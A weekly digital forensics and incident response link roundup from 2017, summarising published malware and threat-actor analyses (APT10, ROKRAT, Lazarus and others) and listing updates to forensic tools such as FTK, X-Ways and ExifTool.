Week 14 – 2017

If you’d like to vote this site for the Forensic 4cast blog of the year, that would be greatly appreciated 🙂
2017 Forensic 4:cast Awards – Voting



  • Irfan Shakeel at Alienvault shares his tips for preparing an effective threat intelligence team. These tips include “establish an intelligence priorities framework, incorporate and consolidate intelligence sources, mapping intelligence collection, specialized threat intelligence experts, [and] adapting finished products to the audience”.
    How to Prepare an Effective Threat Intelligence Team



  • Adrian Nish and Tom Rowles at BAE Systems Threat Research blog share their research into operation Cloud Hopper, which is the campaign linked to APT10.
    APT10 – Operation Cloud Hopper

  • Eric Merritt at Carbon Black examines “a compiled AutoIT script that pretends to be an installer for Photoshop CS6 portable.” This post walks through “the techniques used by this malware to increase the difficulty of discovering the final payload and the methods used to maintain persistence on the system, [and looks at] the tools, tactics, and techniques for reverse engineering this type of AutoIT script.”
    Latest Malware Uses Compiled AutoIT Script to Masquerade As Photoshop CS6 Installer

  • Amanda Rousseau at Endgame provides some background to the REM-101 workshop that she shared last week.
    Reverse Engineering Malware 101 Workshop

  • Roland Dela Paz at Forcepoint analyses a maldoc that distributes a variant of the Philadelphia ransomware
    Off-the-shelf Ransomware Used to Target the Healthcare Sector

  • There were a few posts by Fortinet this week
    • Kai Lu presents “a case study on how to repair a DEX file in which some key methods are erased with NOPs and decrypted dynamically when ready to be executed”
      How to repair a DEX file, in which some key methods are erased with NOPs
    • Jasper Manuel and Artem Semenchenko analyse a sample of malware dubbed BADNEWS, “which is actively being used in the MONSOON APT campaign”. The first post looks at the backdoor, and the second attempts to attribute the sample.

  • Shusei Tomonaga at JPCERT/CC introduces details of the RedLeaves malware and the results of their “analysis including its relation to PlugX, and a tool which is used as the base of this malware”
    RedLeaves – Malware Based on Open Source RAT

  • Hasherezade at Malwarebytes continues her analysis of “a Diamond Fox bot delivered by the Nebula Exploit Kit”. This post takes a “deeper look into the code and analyze the bot’s features and code design.”
    Diamond Fox – part 2: let’s dive in the code

  • Andy at Malware Soup shares some “observations on detecting malicious Microsoft Office documents using Sysmon”. The first post covers detecting “documents leveraging malicious macros to launch a command shell – either cmd.exe or PowerShell” and “documents with malicious scripts embedded as objects”. The second post covers detecting “documents that use malicious macros – or possibly leveraging an exploited vulnerability – to execute shellcode”.

  • Michel Coene at NVISO Labs examines the internal metadata of the LNK file that was extracted in a previous post. Michel also shared this video created by “Didier Stevens … on how to extract the .LNK file from the Word document and analyze it with lnkanalyzer.exe”
    Tracking threat actors through .LNK files

  • There were a few posts on the Palo Alto Networks blog this week
    • Tomer Bar and Tom Lancaster have shared the “joint research between Unit 42 and Eyal Sela [at] ClearSky Cyber Security”. This research looks at two new Windows malware families named “KASPERAGENT and MICROPSIA” and “two families of Google Android malware … SECUREUPDATE and VAMP”.
      Targeted Attacks in the Middle East Using KASPERAGENT and MICROPSIA
    • Claud Xiao, Cong Zheng and Yanhui Jia examine the Amnesia botnet, which is “a new variant of the IoT/Linux botnet “Tsunami””.
      New IoT/Linux Malware Targets DVRs, Forms Botnet
    • Anthony Kasza and Micah Yates analyse a maldoc “with recent compilation and distribution timestamps that has code, infrastructure, and themes overlapping with threats described previously in the Operation Blockbuster report, written by researchers at Novetta.” They were then able to expand their analysis by analysing other maldocs from the same attackers.
      The Blockbuster Sequel

  • The guys at Securelist compile information about the Lazarus group and its effect on the financial industry.
    Lazarus Under The Hood

  • Amanda Lemmers at Cisco explains the benefits of using Netflow and packet capture data in concert. This “allows investigators to be quicker, more agile, and more responsive to threat activity.”
    Harnessing the Power of NetFlow and Packet Analysis

  • Warren Mercer and Paul Rascagneres at Cisco’s Talos blog analyse the attack chain used to distribute the ROKRAT malware.
    Introducing ROKRAT

  • Melissa at Sketchymoose’s Blog shows how to edit a maldoc that has locked the macros behind a password. Turns out modifying one specific character with a hex editor turns off the password requirement.
    Dealing with Macros: Step One – Password Workaround!

  • The guys at Threat Geek share an article by Fidelis Cybersecurity on a campaign that is most probably run by the APT10 (aka Stone Panda) threat actors. The campaign distributes the “reconnaissance malware known as the ‘Scanbox’ framework”.
    Operation TradeSecret: Cyber Espionage at the Heart of Global Trade

  • There were a couple of posts on FireEye’s Threat Research blog this week



  • AccessData have updated FTK and AD Lab to version 6.2 with a host of new additions, improvements, and bug fixes.

  • Cyber Triage have released Cyber Triage Lite, and this post shows the differences between the lite and full versions, as well as a comparison with sysinternals tools.
    Get Free Endpoint Visibility

  • DVR Examiner version 1.31.0 has just been released, adding support for the Mirage_HiSi and UWARE_264 filesystems, “adjusted scanning for the FE family (including DHFS_41, DHPT, zlav, HUAYI, WFS, etc) to work around corrupted index entries, [and] updating API access for downloading native players and updating the license database”.

  • Phil Harvey updated ExifTool to version 10.48 (development release), adding new tags and values.
    ExifTool 10.48

  • Matt Shannon at F-Response has announced the release of F-Response v7 (version The tool is currently in Beta and is “initially only … available for F-Response Field Kit, Consultant, Consultant+Covert, and Enterprise customers.”
    Better late than never, F-Response v7

  • GetData have updated Forensic Explorer to v3.9.8.6414, improving bookmarking speed, adding the partition into the export file path when exporting files, as well as other minor updates
    5 Apr 2017 – v3.9.8.6414

  • Guidance Software have announced an update to Tableau Password Recovery, now at version 1.3. The update adds “full support for TrueCrypt files.”
    Guidance Software And Passware Announce Enhanced Password Recovery Solutions

  • Microsystemation have updated XAMN Spotlight to version 2.0, and XRY to version v7.3. The update to XRY adds support for new devices, apps, and operating system versions, as well as “Better location data reporting, [and an] Android Chip-off profile”.

  • Sanderson Forensics released version 3.2.5 of the Forensic Browser for SQLite, fixing a couple of bugs.
    New release 3.2.5

  • There was a bit of movement at Evimetry this week with the release of the v3.0.0-RC5 release candidate and the free Community Edition. The release candidate fixed a variety of bugs, and added new features including “Remote physical memory acquisition for Windows, MacOS and Linux”, “Improved speed on striped images”, and updated AFF4 support. “With the Community Licenced Evimetry Controller, you can create Linear AFF4 Images on your Windows based analysis system, verify the integrity of AFF4 images, and convert between AFF4, E01/EWF and Raw images. You can also mount AFF4 images as virtual disks and analyse with your preferred forensic tools”. In my opinion, offering the free tool is an absolute must have if the community is to adopt the AFF4 standard.

  • Bradley Schatz at Schatz Forensics/Evimetry has announced the availability of “both a set of patches to the Sleuth Kit and an open source C/C++ implementation for reading AFF4 Standard v1.0 disk images”.
    Sleuth Kit support for the AFF4 Standard v1.0 Released

  • Sumuri have released a new Mac imaging tool, which allows examiners to “image all Intel® Based Macs, including the 2016 MacBook Pro with Touch Bar, [and] supports Apple FileVault, Fusion and Core Storage volumes”.
    Recon Imager

  • X-Ways Forensics 19.2 SR-1 was released with a few bug fixes, as well as support for “metadata extraction from certain irregular DOCX files” and “improved internal handling of FlexFilters”.
    X-Ways Forensics 19.2 SR-1


  • And in self-promotion news, I submitted a talk to the SANS DFIR Summit and unfortunately was rejected, however, they offered to let me present my talk as a webcast instead. The talk that I submitted regarded parsing the URLs that Google generates from performing searches. I’ve found a few interesting artefacts with regards to timestamps and user activity. The talk will be at 11 AM EST/3 PM GMT on the 11th May (and lucky me, 1 AM AEST on the 12th). You can register at the link below.

And that’s all for Week 14! If you think I’ve missed something, or want me to cover something specifically hit me up through the contact page or on the social pipes!


Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s